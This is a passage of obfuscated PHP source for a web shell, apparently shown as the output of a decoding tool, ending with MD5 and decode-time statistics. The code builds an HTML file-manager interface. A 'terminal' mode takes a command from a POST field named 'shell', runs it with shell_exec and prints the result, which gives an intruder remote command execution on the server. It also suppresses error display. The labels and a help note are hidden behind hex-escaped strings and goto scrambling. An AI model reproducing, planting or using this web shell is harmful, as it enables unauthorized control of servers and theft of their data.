} else { echo "\74\163\x63\162\x69\x70\x74\x3e\x77\x69\156\x64\x6f\x77\x2e\x6c\x6f\143\141\x74\151\157\156\75\x27\x3f\x70\x61\164\x68\75" . $nama_folder . "\47\x3b\x61\x6c\145\x72\x74\50\x27\106\157\x6c\144\145\162\40\x47\x61\x67\141\154\x20\x44\151\x62\165\141\x74\47\x29\74\57\x73\143\x72\x69\160\x74\76";
} } echo "\40\74\146\x6f\162\155\x20\155\x65\164\150\x6f\144\x3d\42\120\117\123\x54\42\x3e\40\74\154\x61\x62\145\x6c\x20\x66\157\x72\75\x22\145\170\141\155\160\x6c\145\x46\x6f\x72\x6d\103\157\156\x74\x72\157\x6c\x49\156\x70\165\x74\x31\42\40\143\x6c\x61\x73\x73\75\42\x6c\141\x62\145\154\40\146\x6f\x72\x6d\55\x6c\x61\142\145\154\42\76\116\x61\x6d\x61\x20\x46\157\x6c\144\x65\162\x20\x3a\74\x2f\154\x61\142\145\x6c\76\40\x3c\144\x69\166\40\143\154\141\x73\163\75\42\x74\141\x6d\142\x61\150\x64\151\162\40\151\x6e\160\165\164\55\x67\162\x6f\x75\x70\40\x6d\x62\x2d\x33\42\76\40\74\151\x6e\x70\x75\164\x20\x6e\141\155\145\75\42\156\x61\155\141\x46\x22\40\164\171\x70\x65\75\42\x74\145\x78\x74\x22\40\x63\x6c\141\163\163\x3d\42\x66\x6f\x72\x6d\x2d\x63\x6f\156\x74\162\x6f\154\x22\x20\x70\154\141\143\x65\x68\x6f\154\144\145\x72\75\x22\x4d\141\163\165\x6b\153\x61\156\x20\116\x61\x6d\141\x20\106\x6f\x6c\x64\x65\162\42\x20\x61\162\151\x61\x2d\x64\145\x73\143\x72\151\142\145\x64\x62\x79\75\x22\x62\165\x74\x74\x6f\156\x2d\x61\144\x64\157\x6e\x32\x22\76\40\x3c\x62\165\x74\x74\157\x6e\x20\156\x61\155\145\x3d\x22\x66\157\154\x64\145\x72\x73\x73\x22\40\x63\x6c\x61\163\163\x3d\x22\x6b\x6c\x69\x6b\40\142\x74\x6e\40\142\x74\156\55\157\165\x74\x6c\x69\x6e\x65\55\x73\145\143\x6f\x6e\x64\141\162\x79\42\x20\164\171\x70\x65\75\x22\x73\x75\142\155\151\164\x22\40\151\x64\75\42\142\x75\164\x74\157\156\x2d\x61\x64\144\157\156\x32\42\x3e\x43\162\x65\x61\x74\x65\x20\x46\157\x6c\x64\x65\162\74\x2f\142\x75\164\164\x6f\156\x3e\40\x3c\x2f\x64\x69\x76\76\40\74\57\x66\x6f\x72\x6d\x3e";
} goto Sw8t6;
yVK2Z: ?>
<br> <div class="table-responsive-sm"> <table class="table table-dark table-hover table-sm"> <thead> <tr> <th scope="col-">Type</th> <th scope="col">Name</th> <th scope="col">Permission</th> <th scope="col">options</th> </tr> </thead> <tbody> <?php goto oa08o;
KE1J6: oSCCZ: goto a43tW;
Li6uM: SyNz4: goto wTLL7;
K9M6v: umLDt: goto zbBRb;
Mpn4G: EZ0tt: goto u9i_V;
XxW0A: @clearstatcache();
goto iJL_x;
dHbjl: goto qKC2R;
goto FF9z1;
oWvqN: if ($_GET["\x61\x6b\163\151"] == "\x74\x65\x72\x6d\x69\x6e\x61\154") { echo "\x3c\144\151\166\x20\143\x6c\141\163\x73\x3d\42\141\x6c\x65\x72\x74\x22\76\40\74\x62\x75\x74\164\x6f\156\x20\164\171\160\145\75\x22\x62\165\164\x74\157\x6e\42\40\x63\154\x61\x73\x73\x3d\x22\x62\164\156\40\x62\x74\156\55\144\141\x6e\147\x65\x72\x22\x20\144\x61\164\141\x2d\142\x73\x2d\144\151\x73\x6d\151\163\163\x3d\42\141\x6c\x65\162\164\x22\40\141\x72\x69\x61\x2d\x6c\x61\x62\x65\154\75\42\x43\x6c\157\163\145\x22\x3e\74\151\x20\x63\154\141\163\163\75\x22\142\x69\x20\142\x69\55\x78\55\x6c\x67\x22\x3e\74\x2f\151\x3e\x3c\57\142\x75\x74\x74\x6f\x6e\x3e\40\x3c\x66\x6f\162\x6d\x20\155\x65\164\x68\x6f\144\75\42\x70\x6f\163\164\x22\76\x20\74\144\151\x76\40\143\x6c\141\x73\x73\x3d\42\x69\156\x70\x75\164\55\147\162\157\165\160\40\146\x6c\x65\x78\55\x6e\157\167\x72\141\x70\x22\x3e\40\x3c\163\160\x61\x6e\x20\x63\x6c\141\163\x73\x3d\42\151\156\160\x75\x74\x2d\x67\162\157\x75\160\55\x74\145\170\164\42\x20\151\x64\75\42\141\x64\144\157\x6e\x2d\167\162\x61\x70\160\x69\156\147\42\x3e\162\157\157\x74\100\125\163\x65\162\40\72\x7e\74\57\163\x70\141\x6e\76\x20\74\x69\156\160\165\164\40\x74\171\x70\145\75\42\164\145\170\x74\42\x20\156\141\155\x65\x3d\x22\x73\x68\145\x6c\x6c\x22\x20\x63\x6c\x61\x73\x73\x3d\42\146\157\162\x6d\55\x63\157\156\164\x72\x6f\154\x22\x20\x70\x6c\141\x63\x65\150\157\x6c\144\x65\x72\75\42\x59\x6f\x75\x72\40\103\x6f\x6d\155\141\x6e\144\42\40\x61\162\x69\141\x2d\154\141\142\145\x6c\75\x22\x55\163\145\162\156\141\155\145\x22\x20\x61\162\151\x61\55\x64\x65\x73\143\162\151\142\x65\144\142\171\75\42\x61\x64\x64\157\156\x2d\167\x72\x61\x70\x70\151\156\x67\x22\76\x20\74\x2f\x64\151\x76\x3e\40\74\57\146\157\x72\x6d\76";
if (isset($_POST["\x73\150\x65\154\x6c"])) { $command = $_POST["\163\x68\145\154\154"];
$shell = shell_exec($command);
} echo "\74\x64\x69\166\x20\143\x6c\x61\x73\163\75\42\x6d\x62\55\x33\42\76\x20\x3c\164\x65\170\x74\141\162\x65\141\x20\x63\154\141\163\x73\x3d\42\x66\157\x72\x6d\55\x63\157\156\164\x72\157\x6c\42\40\x69\x64\x3d\42\145\x78\141\x6d\x70\154\x65\106\157\162\x6d\x43\x6f\156\x74\x72\157\x6c\x54\145\170\x74\x61\x72\145\141\x31\x22\40\162\x6f\167\163\75\42\62\60\42\40\141\x72\151\141\55\x6c\x61\x62\145\x6c\75\42\162\145\141\144\x6f\156\x6c\x79\x20\x69\156\x70\x75\x74\x20\145\170\x61\x6d\x70\154\145\x22\x20\162\145\x61\x64\x6f\156\154\171\76" . $shell . "\x3c\x2f\164\145\170\x74\x61\x72\145\x61\76\40\74\144\x69\x76\x20\151\144\x3d\42\145\x6d\141\151\154\110\x65\x6c\x70\42\x20\143\x6c\x61\x73\163\x3d\42\146\157\x72\155\x2d\164\145\x78\x74\42\x3e\x3c\x66\x6f\156\x74\40\x63\157\x6c\157\x72\75\x22\x77\150\x69\x74\145\x22\x3e\52\x4e\x4f\124\105\40\x3a\40\x67\x75\x6e\141\153\x61\x6e\x20\x63\157\155\155\141\156\x64\x20\163\x65\163\165\141\x69\40\x6f\163\54\40\x6a\151\x6b\141\40\x6f\163\x20\167\x69\x6e\144\157\x77\x73\40\x67\165\156\141\153\141\156\x20\x63\157\x6d\x6d\x61\156\144\40\143\155\144\40\46\x20\152\x69\153\x61\40\x6f\x73\x20\154\x69\156\165\x78\40\147\165\x6e\x61\x6b\x61\156\x20\x63\x6f\x6d\x6d\141\x6e\x64\40\154\151\x6e\x75\x78\74\142\x72\x3e\x6f\x73\40\x3d\40\117\x70\145\x72\x61\164\x69\x6e\x67\40\123\x79\163\x74\145\155\74\57\x66\x6f\156\164\x3e\74\57\144\151\166\x3e\40\x3c\x2f\x64\151\166\76\x3c\x2f\x64\x69\x76\x3e";
} goto cMYHn;
Rn05R: goto ohgyw;
goto V0tPI;
mc16c: fhkhs: goto EnfMF;
YjoII: WVZ9c: goto AFxID;
kopA0: @ini_set("\157\165\164\x70\x75\x74\x5f\142\165\146\146\145\x72\151\x6e\147", FALSE);
goto n_8YG;
AXcgL: jXWMb: goto ixusX;
VKjnB: qwXuj: goto lkO2O;
MiQTU: @ini_set("\x64\x69\x73\x70\x6c\x61\x79\x5f\145\x72\x72\157\x72\163", FALSE);
goto zvSdf;
gDINn: goto Ck2ZP;
goto saviH;
peaET: ?>
</center> </div> </div> </div> <br> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"> </script> </body> </html></pre>
Function Calls
None |
Stats
MD5 | 1d6554eb3fd4ae87abd6a56c3288774c |
Eval Count | 0 |
Decode Time | 174 ms |